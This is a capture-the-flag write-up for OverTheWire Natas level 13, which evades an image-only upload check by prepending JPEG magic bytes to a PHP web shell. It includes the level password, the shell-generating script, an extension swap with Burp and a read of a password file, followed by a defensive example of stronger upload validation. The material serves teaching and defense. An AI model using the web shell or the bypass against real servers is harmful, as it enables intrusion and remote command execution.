Level 12 - Level 13

Username: natas13
Password: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9
URL:      http://natas13.natas.labs.overthewire.org

Overview

This level has the same upload form again, but it now states clearly that only images are allowed.


Source Code analysis

Let's take a look at the source code.

The code is almost the same, except that this time the MIME type/magic bytes of the uploaded file are checked with the exif_imagetype function to make sure the uploaded file is an image.

Because exif_imagetype only reads the first bytes of the file, we can bypass this check by creating a PHP shell prepended with the magic bytes of a JPEG file.


Getting the Password

We can create such a file using a simple Python script:

# PHP shell that starts with the JPEG magic bytes, so it passes the image check
with open('shell.php', 'wb') as fh:
    fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')

Upload the file generated by the above script. Remember to intercept the upload request with Burp Suite and change the hard-coded jpg extension to php.

Now let's retrieve the password by viewing the contents of /etc/natas_webpass/natas14.
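Seen from the defender's side, the level fails because the server trusts a signature-only check and a client-supplied extension. The following is an added example, not part of the original write-up or the level's source: it compares the signature check with a structural JPEG check and a server-chosen filename. All function names and both sample byte strings are constructed for illustration.

```python
import secrets

# File signatures mapped to the extension the server will assign.
SIGNATURES = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png", b"GIF8": ".gif"}


def detect_extension(data: bytes):
    """Signature-only detection: the same kind of check the level relies on."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def jpeg_structure_ok(data: bytes) -> bool:
    """Walk JPEG segments from SOI to SOS and require a trailing EOI marker."""
    if not (data.startswith(b"\xff\xd8") and data.endswith(b"\xff\xd9")):
        return False
    pos = 2
    while pos + 4 <= len(data):
        marker, length = data[pos:pos + 2], int.from_bytes(data[pos + 2:pos + 4], "big")
        if marker[0] != 0xFF or length < 2 or pos + 2 + length > len(data):
            return False
        if marker[1] == 0xDA:  # start of scan: header chain is consistent
            return True
        pos += 2 + length
    return False


def stored_name(data: bytes, client_name: str) -> str:
    """Pick the stored filename server-side; client_name is deliberately ignored."""
    ext = detect_extension(data)
    if ext is None or (ext == ".jpg" and not jpeg_structure_ok(data)):
        raise ValueError("not an accepted image")
    return secrets.token_hex(8) + ext


# Constructed samples: JPEG magic bytes followed by harmless PHP text, and a
# minimal JPEG skeleton (SOI, APP0, SOS, EOI).
FAKE = b"\xff\xd8\xff\xe0" + b"<?php echo 'constructed sample'; ?>"
REAL = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(9)
        + b"\xff\xda\x00\x02\x00\xff\xd9")

if __name__ == "__main__":
    print(detect_extension(FAKE))          # signature check alone accepts it
    print(jpeg_structure_ok(FAKE))         # structural check does not
    print(stored_name(REAL, "shell.php"))  # stored with a server-chosen .jpg name
```

A structurally valid image can still carry arbitrary text in its metadata segments, so the server-chosen extension is the control that keeps an upload from being interpreted as PHP.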
